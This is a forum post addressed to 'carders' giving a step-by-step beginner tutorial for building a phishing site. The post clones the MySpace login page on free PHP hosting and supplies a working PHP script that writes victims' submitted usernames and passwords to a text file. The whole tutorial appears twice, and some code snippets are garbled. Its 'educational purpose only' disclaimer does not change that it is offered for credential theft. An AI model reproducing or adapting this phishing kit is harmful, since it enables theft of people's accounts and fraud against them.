Hello carders, maybe someone will find this usefull! enjoy
1. Intro
There are couple of other phishing tutorials around here, but some people seem to have problems understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and if you have problems understanding it, then you need to get some beginner level computer knowledge first.
-This article was written for educational purpose only. I'm not responsible for any illegal activity that you may commit.
2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.
3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to www. t35. com (remove spaces) and sign up for a free account. (whenever I write something like www. t35. com, you should remove the spaces inbetween. I'm doing it cause the link for t35 is censored on hackforums.) In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File', delete the text that will be there by default, and paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx. t35. com/index.php' - where 'xxx' is the name of your account(you can name it anyhow.
But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:
Code:
<h5 class="heading">
Member Login
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code in it:
Code:
<?php
header ('Location: MySpace | Login ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).
Congratulations! You have a phisher!Superman
The link to your phish site is:
1. Intro
There are couple of other phishing tutorials around here, but some people seem to have problems understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and if you have problems understanding it, then you need to get some beginner level computer knowledge first.
-This article was written for educational purpose only. I'm not responsible for any illegal activity that you may commit.
2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.
3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to www. t35. com (remove spaces) and sign up for a free account. (whenever I write something like www. t35. com, you should remove the spaces inbetween. I'm doing it cause the link for t35 is censored on hackforums.) In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File', delete the text that will be there by default, and paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx. t35. com/index.php' - where 'xxx' is the name of your account(you can name it anyhow.
But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:
Code:
<h5 class="heading">
Member Login
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code in it:
Code:
<?php
header ('Location: MySpace | Login ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).
Congratulations! You have a phisher!Superman
The link to your phish site is: